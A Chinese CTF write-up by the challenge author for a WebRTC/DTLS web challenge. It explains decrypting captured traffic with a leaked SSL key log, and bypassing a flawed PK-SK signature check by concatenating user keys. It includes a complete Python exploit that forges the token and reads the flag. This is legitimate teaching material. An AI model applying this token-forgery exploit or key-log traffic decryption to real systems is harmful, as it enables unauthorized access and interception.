伽玛实验场 | PDC面壁计划管理系统-出题人视角

WriteUp 1年前 (2023) admin
971 0 0
编者荐语:
感谢小蓝蓝师傅的投稿,本题已部署在伽玛实验场,欢迎各位师傅前去挑战~也欢迎各位师傅踊跃投稿。

伽玛实验场 | PDC面壁计划管理系统-出题人视角https://www.ichunqiu.com/battalion?t=1&r=70899

+ + + + + + + + + + + 

写在前面

打了VNCTF 2022的选手可能会发现本文中提到的部分文件与比赛中的附件有些许出入,这是因为我在比赛的前一天试图提升难度,建立了新的附件包。但是由于整体比赛环境均已搭建完成,替换附件会带来不稳定因素,因此最后没有替换成更高难度的附件。本文所述内容以及复现环境均使用新版附件。

题目分析——发现证书体系变更

首先,我们拿到附件包,可以看到附件包中有四个文件。

伽玛实验场 | PDC面壁计划管理系统-出题人视角

这四个文件分别是:

  • aiortcapp.py中引用的库文件
  • app<beta版本>.py – 部分源码
  • cmdHostory – 部分部署命令
  • important.pcapng – 流量包



  • 其中,aiortc其实是一个开源的软件包。Github:(https://github.com/aiortc/aiortc) 但是这里在附件里给出,说明要么此处使用了较老的版本,要么是对其中内容进行了魔改。此处我们可以使用diff方法对两个包进行分析。首先我们下载主分支软件包,之后将其与附件中的aiortc放置于同一目录下。

伽玛实验场 | PDC面壁计划管理系统-出题人视角

运行diff aiortc/src/aiortc aiortc-main/src/aiortc -u

⚠️注意,由于diff的目录穿越层数有限,一般情况下只能查找一层目录。因此可以逐目录多次运行diff。例如先尝试diff aiortc aiortc-main -u,然后运行diff aiortc/src aiortc-main/src -u直至核心代码目录。

此处我们仅摘取关键的diff代码段:

-from cryptography.hazmat.primitives.asymmetric import rsa
+from cryptography.hazmat.primitives.asymmetric import ec
+from OpenSSL import SSL, crypto

-def generate_certificate(key: rsa.RSAPrivateKey) -> x509.Certificate:
+def generate_certificate(key: ec.EllipticCurvePrivateKey) -> x509.Certificate:

-key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=default_backend())
+key = ec.generate_private_key(ec.SECP256R1(), default_backend())

这段diff结果标明了,我将原软件包的EC证书替换成了RSA证书。RSA证书我们已经很熟悉了,此处不再展开。

EC证书与流量分析

EC证书指使用了ECC(Elliptic Curves Cryptography,椭圆曲线密码)技术生成的证书,与RSA证书、SM2证书一样,都可以用于标准SSL通信。它的私钥文件头为:-----BEGIN EC PRIVATE KEY-----。那么,这个证书到底会给出题人,也就是我带来怎样的问题呢,以至于我需要把它替换掉?

首先,相信各位选手对于常规TLS的流量解密已经很熟悉了,一共有两种方式,一种是想办法获取通信过程双方的私钥,在wireshark中添加进行解密。Wireshark 3.0.0之前的添加方式(Edit -> Preferences -> Protocols -> TLS):

伽玛实验场 | PDC面壁计划管理系统-出题人视角

Wireshark 3.0.0之后虽然保留了这个入口,但实际上此方法已经弃用,新的添加方法是( Edit -> Preferences -> RSA Keys):

伽玛实验场 | PDC面壁计划管理系统-出题人视角

但是,这个方法有一个致命的问题,那就是,这个方法基于一个大前提,那就是双方的SSL通信密文必须能被这个密钥所解密。这听起来像一句废话,SSL通信的基础就是公私钥加密体制,怎么可能不能被私钥解密呢。这里我们就要提到DH密钥交换算法了。

DH密钥交换算法

DH密钥交换算法指Diffie-Hellman密钥协商算法,过程如下:

伽玛实验场 | PDC面壁计划管理系统-出题人视角

限于篇幅,此处我们不展开密码学原理,有兴趣的读者可以自行查阅资料。只需要明确一点,在DH算法中,仅获取私钥时无法针对密文进行解密,而EC整数的SSL通信就使用了此算法。 这一点在wireshark官网其实也有提到,以下摘自wireshark wiki(Google 翻译提供译文): 当提供适当的秘密时,Wireshark 支持 TLS 解密。 两种可用的方法是:

  • 使用每个会话秘密的密钥日志文件(
    https://wiki.wireshark.org/TLS#using-the-pre-master-secret
    )。
  • 使用 RSA 私钥解密。 密钥日志文件是一种始终启用解密的通用机制,即使正在使用 Diffie-Hellman (DH) 密钥交换也是如此。 RSA 私钥仅在有限的情况下有效。 关键日志文件是FirefoxChromecurl等应用程序在运行时生成的文本文件。 SSLKEYLOGFILE环境变量已设置。 准确地说,它们的底层库(NSSOpenSSLboringssl)将所需的每个会话机密写入文件。 随后可以在 Wireshark 中配置此文件(
    https://wiki.wireshark.org/TLS#using-the-pre-master-secret
    )。

RSA私钥文件只能在以下情况下使用:

  • 服务器选择的密码套件未使用 (EC)DHE
  • 协议版本为 SSLv3(D)TLS 1.0-1.2。 它不适用于 TLS 1.3
  • 私钥与 服务器 证书匹配。 它不适用于 客户端 证书,也不适用于证书颁发机构 (CA) 证书。
  • 会议尚未恢复。 握手必须包含 ClientKeyExchange 握手消息。 通常建议使用密钥日志文件,因为它适用于所有情况,但需要持续从客户端或服务器应用程序导出机密信息的能力。 RSA 私钥的唯一优点是它只需要在 Wireshark 中配置一次即可启用解密,但受到上述限制。

这里我们看到,WireShark声明,使用密钥日志文件可以解密通过DH算法生成的TLS密文。但是很遗憾,经过测试,使用ECCDTLS协议在使用ssl.log时无法进行解密。

题目分析——发现SSL Log位置

好了,我们回到题目,现在我们发现了证书体系的变更,也知道了变更后如果我们可以获得RSA私钥或者SSL Log就可以解密TLS流量了。再看一眼diff分析的结果,还有这样的一处变更:

@@ -46,42 +40,25 @@

 logger = logging.getLogger(__name__)

-assert lib.OpenSSL_version_num() >= 0x10002000, "OpenSSL 1.0.2 or better is required"

-# Log TLS secrets to a file, similar to browsers
-SSLKEYLOGFILE = os.getenv('SSLKEYLOGFILE')
-if SSLKEYLOGFILE:
-    logger.warning('Logging all TLS keys to %s', SSLKEYLOGFILE)
+def DTLSv1_get_timeout(self):
+    ptv_sec = SSL._ffi.new("time_t *")
+    ptv_usec = SSL._ffi.new("long *")
+    if SSL._lib.Cryptography_DTLSv1_get_timeout(self._ssl, ptv_sec, ptv_usec):
+        return ptv_sec[0] + (ptv_usec[0] / 1000000)
+    else:
+        return None

-class DtlsError(Exception):
-    pass

这一处变更意味着如果我们能找到SSLKEYLOGFILE这个环境变量,且能下载那个文件,我们就能解密流量了。

运行grep "SSLKEYLOGFILE" cmdHostory -n发现有两处路径

伽玛实验场 | PDC面壁计划管理系统-出题人视角

进一步查看cmdHostory文件内的上下文进行分析

伽玛实验场 | PDC面壁计划管理系统-出题人视角

显然这个进入docker内的环境变量才是我们想要的。

题目分析——下载部分的源码分析

现在,我们分析题目给出的残破源码。首先基于前面的分析,我们现在迫切的需要找到一个下载点来解密流量,我们注意到源码中有如下片段:

async def download(request):
    query = query_parse(request)
    if query == None or 'file' not in query.keys():
        content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
        return web.Response(status=403, content_type="text/html", text=content)
    filename = query.get('file')
    file_dir = '<beta版本尚未提供>'
    file_path = os.path.join(file_dir, filename)
    if filename != '<beta版本尚未提供>':
        content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
        return web.Response(status=403, content_type="text/html", text=content)
    if os.path.exists(file_path):
        async with aiofiles.open(file_path, 'rb'as f:
            content = await f.read()
        if content:
            response = web.Response(
                content_type='application/octet-stream',
                headers={'Content-Disposition''attachment;filename={}'.format(filename)},
                body=content)
            return response
        else:
            return web.Response(status=404, content_type="text/html", text="文件为空")
    else:
        return web.Response(status=404, content_type="text/html", text="文件未找到")


分析可知,我们可以通过http://ip:port/download?file=<filename>来下载文件,但是只能下载指定目录下的指定文件,此处可以尝试使用我们之前分析发现的http://ip:port/download?file=ssl.log来下载,会发现下载成功。

题目分析——流量分析

如果我们打开过页面,会发现关键路径tell2me,打开流量包使用字符串查找:

伽玛实验场 | PDC面壁计划管理系统-出题人视角

现在我们找到了关键IP和端口,在wireshark首选项将23333加入http端口

伽玛实验场 | PDC面壁计划管理系统-出题人视角

在加入ip.addr == 121.4.47.87过滤条件,就可以滤去大量的干扰流量了。现在我们可以通过流量分析获取基本的交互流程:

  1. 首先访问tell2me,传递三个参数sdp、type、token

    伽玛实验场 | PDC面壁计划管理系统-出题人视角

  2. 随后双方建立DTLS信道,在此信道中,首先发送ls

    伽玛实验场 | PDC面壁计划管理系统-出题人视角

  3. 之后还没收到回复就直接发送了cat flag

    伽玛实验场 | PDC面壁计划管理系统-出题人视角

  4. 之后连续收到了两个回复,分别是server.py flag

    伽玛实验场 | PDC面壁计划管理系统-出题人视角

  5. 以及cat: flag: Permission denied:

    伽玛实验场 | PDC面壁计划管理系统-出题人视角

OK,到这里可能还是有些云里雾里,此时我们回去继续看源码。

题目分析——主逻辑部分的源码分析(PKSK)

接下来我们来看主逻辑,首先第一个代码逻辑:

try:
    params = await request.json()
except json.decoder.JSONDecodeError:
    content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
    return web.Response(status=403, content_type="text/html", text=content)
if "token" not in params.keys():
    content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
    return web.Response(status=403, content_type="text/html", text=content)
else:
    submitToken = str(params["token"])
    if len(submitToken) < 32 + 13 + 5:
        content = "PDC 已经记录了您这次攻击行为!"
        return web.Response(status=403, content_type="text/html", text=content)
    else:
        pk = submitToken[45:]
        sk = ""
        for pkKey in pk2sk.keys():
            if pkKey in pk:
                sk = pk2sk[pkKey]
        if sk == "":
            content = "PDC 已经记录了您这次攻击行为!"
            return web.Response(status=403, content_type="text/html", text=content)
        else:
            timeStamp = int(round(time.time()) * 1000)
            signText = f"{submitToken[32:45]}-{sk}"
            md5Object = hashlib.md5()
            md5Object.update(signText.encode())
            if md5Object.hexdigest().upper() != submitToken[:32]:
                content = "PDC 已经记录了您这次攻击行为!"
                return web.Response(status=403, content_type="text/html", text=content)
            elif(timeStamp - int(submitToken[32:45]) < 600000):
                if submitToken[45:50] == '?????':

这是一个简单的PK-SK验签机制实现,首先确保传入参数同时满足以下三个条件:

  • JSON格式且不存在语法错误
  • 存在token字段
  • token字段长度大于50字节 之后按长度进行拆分,其中最后一部分内容为不定长的PK,服务端维护PK-SK的映射表。依次遍历映射表,如果服务端PKClient传来的PK的子集,则认为应当使用此PK对应的SK,之后如果再次命中,则使用新的SK。可以看到这个逻辑其实很奇怪,明明是直接sk=pk2sk[pk]就能解决的问题,结果实现的这么奇怪,大史说过“邪乎到家必有鬼”,所以这里其实就是漏洞点。

伽玛实验场 | PDC面壁计划管理系统-出题人视角

好,首先,源码一开始,我们可以看到一个字典,定义为:

pk2sk = {"?????":"<beta版本尚未提供>","?????":"8d509c28896865f8640f328f30f15721"}

流量中传入的token

2D041B4B9AA98AFAB545FE0F4651E7951674991453000weisi

那么,如果weisi代表书中人物常伟思,那么,我们可以合理推断完善字典定义为:

pk2sk = {"luoji":"<beta版本尚未提供>","weisi":"8d509c28896865f8640f328f30f15721"}

那么其实我们有了一个验证的途径,按源码分拆token:

timeStamp = 1674991453000
pk = weisi
signText = 2D041B4B9AA98AFAB545FE0F4651E795

我们只需要计算md5("1674991453000-8d509c28896865f8640f328f30f15721")是否等于signText就可以证明我们的论断是否正确。

伽玛实验场 | PDC面壁计划管理系统-出题人视角

显然正确。那么,我们假定,pk的内容是luojiweisi,想想看会发生什么。程序会首先使用罗辑的sk,但是循环没有停止,程序会读取伟思的sk覆盖并最终使用此sk进行验签。当然,就算我们可以通过验签,最终我们的pk会是奇怪的luojiweisi,理论上通过不了后续权限才对。我们来看最后一行:

if submitToken[45:50] == '?????':

也就是说,权限验证时会忽略超出50个字节的内容,这就使得我们可以以罗辑的身份通过检查。

题目分析——主逻辑部分的源码分析(拿到flag)

最后,我们来看最终的通过了权限验证之后的逻辑:

if submitToken[45:50] == '?????':
    if "sdp" not in params.keys() or "type" not in params.keys():
        content = "您好,?????!"
        return web.Response(content_type="text/html", text=content)
    else:
        offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
        pc = RTCPeerConnection()
        pcs.add(pc)
        @pc.on("datachannel")
        <beta版本尚未提供>
        @pc.on("connectionstatechange")
        <beta版本尚未提供>
        <beta版本尚未提供>
        return web.Response(
            content_type="application/json",
            text=json.dumps(
                {"sdp": pc.localDescription.sdp, "type":pc.localDescription.type}
            ),

        )

elif submitToken[45:50] == '?????':
    if "sdp" not in params.keys() or "type" not in params.keys():
        content = "您好,?????!"
        return web.Response(content_type="text/html", text=content)
    else:
        offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
        pc = RTCPeerConnection()
        pcs.add(pc)
        @pc.on("datachannel")
        <beta版本尚未提供>
        @pc.on("connectionstatechange")
        <beta版本尚未提供>
        <beta版本尚未提供>
        return web.Response(
            content_type="application/json",
            text=json.dumps(
                {"sdp": pc.localDescription.sdp, "type":pc.localDescription.type}
            ),
        )

这段代码实际上是想提示两点:

  • 无论登录的身份是什么,实际上都会走webRTC建立后续的信道进行通信。
  • 可以参考aiortc官方提供的example,本题实现没有过多改动。联想到之前流量分析时提示的是无权限读flag,那么我们其实只要以伟思的身份传token再正常建立一个WebRTC Client重发xiaolanlan:cat flag就可以拿到flag了。

EXP

import requests
import time
import json
import hashlib
import asyncio
import argparse
from aiortc import RTCIceCandidate, RTCPeerConnection, RTCSessionDescription
from aiortc.contrib.signaling import BYE, add_signaling_arguments, create_signaling
from aiortc.sdp import candidate_from_sdp, candidate_to_sdp
from cryptography.hazmat.primitives import serialization
time_start = None
pk = "luojiweisi"
sk = "8d509c28896865f8640f328f30f15721"
url = "http://url/tell2me"

def object_to_string(obj):
    if isinstance(obj, RTCSessionDescription):
        message = {"sdp": obj.sdp, "type": obj.type}
    elif isinstance(obj, RTCIceCandidate):
        message = {
            "candidate""candidate:" + candidate_to_sdp(obj),
            "id": obj.sdpMid,
            "label": obj.sdpMLineIndex,
            "type""candidate",
        }
    else:
        assert obj is BYE
        message = {"type""bye"}
    return message
    
def object_from_string(message_str):
    message = json.loads(message_str)
    if message["type"in ["answer""offer"]:
        return RTCSessionDescription(**message)
    elif message["type"] == "candidate" and message["candidate"]:
        candidate = candidate_from_sdp(message["candidate"].split(":"1)[1])
        candidate.sdpMid = message["id"]
        candidate.sdpMLineIndex = message["label"]
        return candidate
    elif message["type"] == "bye":
        return BYE

def channel_log(channel, t, message):
    print("channel(%s) %s %s" % (channel.label, t, message))

  
def channel_send(channel, message):
    channel_log(channel, ">", message)
    channel.send(message)

def current_stamp():
    global time_start
    if time_start is None:
        time_start = time.time()
        return 0
    else:
        return int((time.time() - time_start) * 1000000)

async def consume_signaling(pc, signaling):
    while True:
        obj = await signaling.receive()
        if isinstance(obj, RTCSessionDescription):
            await pc.setRemoteDescription(obj)
            if obj.type == "offer":
                # send answer
                await pc.setLocalDescription(await pc.createAnswer())
                await signaling.send(pc.localDescription)
        elif isinstance(obj, RTCIceCandidate):
            await pc.addIceCandidate(obj)
        elif obj is BYE:
            print("Exiting")
            break

def sendSDPRequest(WRTCConnectionInfo):
    timeStamp = int(round(time.time()) * 1000)
    signText = f"{timeStamp}-{sk}"
    md5Object = hashlib.md5()
    md5Object.update(signText.encode())
    signValue = md5Object.hexdigest().upper()
    WRTCConnectionInfo["token"] = f"{signValue}{timeStamp}{pk}"
    res = requests.post(url,json=WRTCConnectionInfo)
    return res.text

async def run_offer(pc, signaling):
    await signaling.connect()
    channel = pc.createDataChannel("chat")

    async def send_ls():
        channel_send(channel, f"xiaolanlan:ls")
        await asyncio.sleep(1)
        
    async def send_cat_flag():
        channel_send(channel, f"xiaolanlan:cat flag")
        await asyncio.sleep(1)
        
    @channel.on("open")
    def on_open():
        print("Connect Open!")
        asyncio.ensure_future(send_ls())
        asyncio.ensure_future(send_cat_flag())

    @channel.on("message")
    def on_message(message):
        channel_log(channel, "<", message)
    # send offer
    await pc.setLocalDescription(await pc.createOffer())
    sdpResponse = sendSDPRequest(object_to_string(pc.localDescription))
    # await signaling.send(pc.localDescription)
    obj = object_from_string(sdpResponse)
    if isinstance(obj, RTCSessionDescription):
        await pc.setRemoteDescription(obj)
        if obj.type == "offer":
            # send answer
            await pc.setLocalDescription(await pc.createAnswer())
            await signaling.send(pc.localDescription)
    elif isinstance(obj, RTCIceCandidate):
        await pc.addIceCandidate(obj)
    elif obj is BYE:
        print("Exiting")
    await consume_signaling(pc, signaling)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    add_signaling_arguments(parser)
    args = parser.parse_args()
    signaling = create_signaling(args)
    pc = RTCPeerConnection()
    private_key = pc._RTCPeerConnection__certificates[0]._key
    public_key = private_key.public_key()
    rsa_pem = private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.TraditionalOpenSSL,encryption_algorithm=serialization.NoEncryption())
    coro = run_offer(pc, signaling)
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(coro)
    except KeyboardInterrupt:
        pass
    finally:
        loop.run_until_complete(pc.close())
        loop.run_until_complete(signaling.close())

伽玛实验场 | PDC面壁计划管理系统-出题人视角

后记

限于篇幅,WebRTC的相关知识此处就不展开了,作为一个比较成熟的协议,网上关于它的分析也有很多,再加上本题主要是用它作为一个正向的工具,而非是利用它的漏洞,也不必展开。(但是万一后面我会基于这个出pwn也说不准嘿嘿)总之最后给大家说几点问题吧:

  • 第一点也是最重要的一点,由于webRTC在实现时,会调用内核能力自动选择可用的UDP端口进行信道建立,这使得我们无法使用单一端口映射的方式部署,而端口区间映射也容易导致打不通,所以最优解是使用host模式部署,与宿主机共享端口,独占VPS,这里也再次感谢春秋GAME提供资源,给各位CTFer一个复现的机会。
  • 另外,WebRTC作为P2P长连接通信,会涉及Server反连,WebRTC本身支持TUN/STUN方式进行内网穿透。因此,各位选手无需进行额外设置,在本地即可打通,但是仍需注意的是,部分公司/学校会将内网穿透认定为违规行为,利用TUN/STUN方式进行内网穿透是极容易被检测到的行为。因此,若您的公司/学校有相关规定,请勿在其办公网/校园网进行本赛题的复现。
  • 最后由于内网穿透本身的不稳定性,有可能会反连失败,因此,如果你的EXP打不通,请积极重试。(卡在上图红框位置就是反连失败了)
  • 运行脚本时,请注意使用随附件给出的aiortc版本,否则可能会导致SSL证书链算法不兼容导致TLS握手失败。(如果这句看不懂,请重读本文”题目分析——发现证书体系变更”一节)

+ + + + + + + + + + + 

END


春秋GAME伽玛实验室

会定期分享赛题赛制设计、解题思路……

如果你日常有一些技术研究和好的设计思路

或在赛后对某道题有另辟蹊径的想法

欢迎找到春秋GAME投稿哦~

联系vx:cium0309

欢迎加入 春秋GAME CTF交流2群

Q群:703460426
伽玛实验场 | PDC面壁计划管理系统-出题人视角


伽玛实验场 | PDC面壁计划管理系统-出题人视角

原文始发于微信公众号(春秋伽玛):伽玛实验场 | PDC面壁计划管理系统-出题人视角

版权声明:admin 发表于 2023年2月28日 下午6:48。
转载请注明:伽玛实验场 | PDC面壁计划管理系统-出题人视角 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...